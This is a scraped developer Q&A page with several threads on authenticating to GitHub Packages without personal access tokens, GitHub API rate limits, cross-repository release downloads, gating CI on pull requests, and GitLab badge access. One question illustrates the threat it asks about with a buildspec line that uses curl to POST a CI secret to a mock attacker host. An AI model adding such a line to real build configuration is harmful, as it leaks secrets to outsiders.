Use Github Package Registry without authtoken - github

In my node project I would like to use both NPM and Github registries. The reason is that I use some packages as request or async, but I've made my own packages which are stored on Github Packges Registry.
I've tried to add #USERNAME:registry=https://npm.pkg.github.com/ in .npmrc, but I still need an authtoken. There is the problem: as it's for a continuous integration I don't want to use a token linked to a specific user.
So what could I do ?
Edit: I'm using Circle CI for my workflows.

You can use the default GITHUB_TOKEN associated with the repository that your workflow runs in.
If you are using a GitHub Actions workflow, you can use a GITHUB_TOKEN to publish and consume packages in the GitHub Package Registry without needing to store and manage a personal access token.
ref: https://help.github.com/en/github/managing-packages-with-github-package-registry/configuring-npm-for-use-with-github-package-registry#authenticating-to-github-package-registry
If you are not using GitHub Actions and running your build in a different CI tool then I don't think you have any choice but to use a Personal Access Token tied to a user account.

Related

GitHub Actions: Downloading release files from a different repository

I have Repo A (private, in an organization), which has a GitHub Actions workflow that builds and bundles my application into a tar.gz file and includes it as an artifact in a Release.
I have Repo B (also private, same organization) which, in the GitHub Actions workflow, needs to download the release artifacts from a specific release of Repo A, and do other things with it.
What is the modern best-practices approach to enabling this cross-repo release access within an organization? Last time I did this, we had to use a Personal Access Token for a machine user that we created, which is all sorts of bad (machine user GitHub account, long-lived secret, etc.). GitHub has since added a lot of capability with the built-in GITHUB_TOKEN secret, with OIDC support within Actions, etc. Is there a better way to achieve what I'm trying to do?
If you are using a Linux Docker container, you can try and use dsaltares/fetch-gh-release-asset which is meant to:
downloads an asset from a GitHub release and provides some release details as output.
Private repos are supported.
You can find an example here.
But it does use a GitHub token which defaults to ${{ secrets.GITHUB_TOKEN }}: make sure it is a GitHub App installation access token.

Using github packages without personal access token?

The project I'm working on currently deploys our private node packages via github packages. Our current workflow is for each developer to create and maintain their own personal access token, and then we use a central account's PAT for automation in AWS.
I was wondering if it's possible to authenticate with github packages without the use of Actions or PAT's?
As of 2022-07-30
No, it is not possible to use github packages without a personal access token (PAT):
It is not possible to upload without a PAT (which makes sense as it prevents random people to upload binaries to your package repo);
It is not possible to download without a PAT (not even publicly available packages can be used);
As early as 2019-10-20, people have requested github to remove PATs as a requirement for mainly downloading public packages.
The idea is that users of libraries should not need to have a github account to access a developer's package.
Sadly, the request for pat-less package downloads was not granted by Github to this day.
If you want a package registry without a hassle, it might be wise to look for other registries, such as MavenCentral or JitPack (not necessarily meant for node packages),
or host a service yourself.
I even had to link a cached webpage, as the original question has been removed from Github community along with a bunch of related questions.
Another question on github, stating pat-less access to packages is still on the roadmap for "fall 2021" is here.
I could not find what the current status of this feature is.
Edit: It is possible to download binaries without a PAT for public repositories using jitpack.io. Jitpack builds the given jar/aar on their servers.
You can add jitpack as a repository to your build system, and use the jitpack-specified URL to reference releases, branches, or specific commits.
Sadly, there is no way to refer to packages (yet).
However, this system allows your users to use your code without needing PATs nor a Github account.
I'd like to offer an alternative.
You may use a Gradle plugin of mine (magik, I was exactly in your shoes) to easier the consumption of artifacts from your Github Packages for Gradle clients.
It require you to save your read-only PAT on the repo itself, so that the users don't have to deal with any authentication (apart using the plugin above mentioned)

Overcoming GitHub API Rate-Limiting from a Public Project?

I have a public repository which is an Ansible role. This Ansible role uses the GitHub API in order to get the most recent release for a given repository. I use this metadata in order to then subsequently download the latest release binary for the given project.
Unfortunately, I'm hitting GitHub's API rate-limit when running my tests in Travis and occasionally on my local machine. Since this is a public-facing project, what are my options for overcoming this rate limit?
I could use some kind of secret management system in Ansible or expose the value via Travis environment variables, but is there a standard practice for dealing with these kinds of scenarios for public code?
Unauthenticated requests only get 60/hour. Authenticated requests get 5000/hour.
To authenticate, generate a personal API access token for use by the project. Put it either in an encrypted Travis environment variable or some other way to store encrypted secrets (for example, Rails has built in encrypted credentials. Use that token to access the API.
Make a separate Github account for the project and use an API token for that. This avoids sharing its rate limit with anyone else.
Use Git commands on a local clone where possible. For example, if you want to look up a commit instead of doing it via the API, clone the repository and use normal Git commands. Cache the clones and git fetch periodically to keep them up to date.
Finally, make use of conditional requests. These use HTTP headers so you can safely use cached queries. These do not count against your rate limit. A good Github authentication library should have an option for caching.

Prevent GitHub PR checks running without manual intervention

I have ran into a situation where I have a repo on GitHub that I am looking to make public.
Currently, one of the PR checks runs CI tests on AWS CodeBuild.
Because of the nature of the tests, there are environment variables that contain secrets. The results/logs from the build output will not be public, which is one good thing.
AWS CodeBuild uses the buildspec.yml file to run commands in CI.
If I were to have an environment variable, for example $SECRET_THING, an attacker would be able to simply open a PR, adding to buildspec.yml, for example:
- curl -X POST -d"thesecret=$SECRET_THING" https://mwahahahaha.com/grab_it
Which would then send themselves the secret.
Using either a setting in GitHub, the GitHub checks API or CodeBuild, is there a way that would require manual intervention to run the check, preferably after a code review? (eg. a button clickable only by an authorised collaborator on the PR page)
Don't use plain text environment variable, instead use "env > parameter-store" to store your secret. If you are using CodeBuild's console UI you can create the paramater store entry from "advanced > environment
variables > type: parameter store" https://aws.amazon.com/codebuild/latest/userguide/build-spec-ref.html#build-spec-ref-syntax
Also, CodeBuild allows you to define the buildspec as part of the project. This way the buildspec yml file is not present in your repository.
Note: CodeBuild only allows repo owner or admin to create the webhook.
Update: #Chris CodeBuild supports filter groups for PR builds. Documentation # https://docs.aws.amazon.com/codebuild/latest/userguide/sample-github-pull-request.html#sample-github-pull-request-filter-webhook-events-console. You can filter on the actor to ensure that only trusted collaborators can trigger a build for PR or push events.

Can Gitlab expose build and coverage badges to anonymous users?

We are hosting some repository on GitHub, some other on GitLab.
Sometimes, the package is published but not the source code.
We always display build status and code coverage in README.md.
Is there a way to have build and coverage badge on GitLab always accessible to anonymous?
Since release 11.4.8 of Gitlab it's not possible to expose project's Badges through a Personnal Access Token anymore. Because of the change "
Restrict Personal Access Tokens to API scope on web requests."
The commit that removed this "workaround" was published as a security fix
An ongoing issue is currently being discussed to find another solution. Let's see how it goes.
That was followed by issue 13324
It includes:
FYI, I have a workaround for this using the GitLab API.
It assumes you have created a token in GitLab for a user (Note: That "user" needn't necessarily be Human - my use case is to display a badge on a dashboard hosted on a different VM).
<img src="https://<gitlab-uri>/<namespace>/<project>/badges/<branch>/build.svg?private_token=<token>
Update Dec. 2018: This is no loger possible through a token (see Paul B.'s answer).
This is because of "Improper Enforcement of Token Scope":
The GitLab web interface was vulnerable to an authorization issue that allowed access to the web-UI as a user using their Personal Access Token (PAT) of any scope.
The issue is now mitigated in the latest release and is assigned CVE-2018-19569.
But...:
Updated: 2018-11-28: We have received reports that this change has impacted how repo files and job artifacts are downloaded for some users.
For instructions on how to do so through the API, please see our support issue.
And you also have a current workaround which repeats the API access:
It is possible to add the project avatar to the project repository with a particular filename (logo) and then this file will be used for the avatar. There is an example here:
https://gitlab.com/issue-reproduce/project-avatar-repo
You'll be able to retrieve the files through the Repository Files API:
https://docs.gitlab.com/ee/api/repository_files.html#get-file-from-repository
Example:
https://gitlab.com/api/v4/projects/issue-reproduce%2Fproject-avatar-repo/repository/files/logo.png?ref=master